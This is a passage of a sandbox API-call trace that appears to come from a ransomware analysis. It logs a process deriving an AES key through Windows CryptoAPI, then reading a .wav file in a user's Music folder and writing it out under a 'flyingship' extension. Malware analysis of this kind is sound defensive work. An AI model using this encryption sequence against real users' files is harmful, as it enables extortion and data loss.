lpString1="pL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.411] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.411] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.411] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.411] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.412] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.412] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.412] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.412] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf356ccc0, ftCreationTime.dwHighDateTime=0x1d5e47b, ftLastAccessTime.dwLowDateTime=0x91c4fd00, ftLastAccessTime.dwHighDateTime=0x1d5e17f, ftLastWriteTime.dwLowDateTime=0x91c4fd00, ftLastWriteTime.dwHighDateTime=0x1d5e17f, nFileSizeHigh=0x0, nFileSizeLow=0x10526, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Xxiiq96uF_.wav", cAlternateFileName="XXIIQ9~1.WAV")) returned 0x90ae18 [0187.412] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.412] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.412] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0187.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.427] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0187.428] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.428] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.428] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.428] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.428] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.429] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0187.429] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0187.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.429] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0187.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.429] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.429] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0187.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.429] CryptDestroyHash (hHash=0x90af58) returned 1 [0187.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\xxiiq96uf_.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0187.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0187.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0187.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.432] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0187.432] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0187.432] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0187.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0187.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0187.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0187.434] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4")) returned 0x10 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0187.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\xxiiq96uf_.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0187.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0187.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.436] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0187.436] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0187.436] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0187.436] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0187.437] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0187.437] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0187.441] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x526, lpOverlapped=0x0) returned 1 [0187.442] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0187.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10526) returned 0xbea018 [0187.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0187.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0187.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10526) returned 0xbfa548 [0187.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 